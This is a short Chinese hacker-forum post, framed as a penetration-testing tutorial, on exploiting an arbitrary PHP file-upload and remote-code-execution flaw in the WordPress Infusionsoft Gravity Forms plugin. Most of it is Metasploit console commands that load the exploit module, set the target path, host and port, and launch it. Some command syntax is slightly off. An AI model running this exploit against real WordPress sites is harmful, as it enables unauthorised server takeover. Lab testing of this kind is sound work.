WordPress实战渗透测试教程:利用插件(Infusionsoft)的文件上传漏洞

zevseo
27020zevseo大版主
2018-09-11 03:08:21
27020 2018-09-11 03:08:21
该模块利用WordPress Infusionsoft Gravity Forms插件中的任意PHP代码上传,版本从1.5.3到1.5.10。该漏洞允许任意文件上传漏和远程代码执行。
利用目标
Infusionsoft Gravity Forms插件1.5.3
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole

描述:渗透测试教程:利用Infusionsoft的文件上传漏洞来审计WordPress

图片:2 (1).png

渗透测试教程:利用Infusionsoft的文件上传漏洞来审计WordPress

现在输入  exploit use / unix / webapp / wp_ infusionsoft_upload
msf exploit (wp_infusionsoft_upload)>set targeturi /wordpress
msf exploit (wp_infusionsoft_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_infusionsoft_upload)>set rport 80
msf exploit (wp_infusionsoft_upload)>exploit  

描述:渗透测试教程:利用Infusionsoft的文件上传漏洞来审计WordPress

图片:6.png

渗透测试教程:利用Infusionsoft的文件上传漏洞来审计WordPress

本文标题:WordPress实战渗透测试教程:利用插件(Infusionsoft)的文件上传漏洞
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2319.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan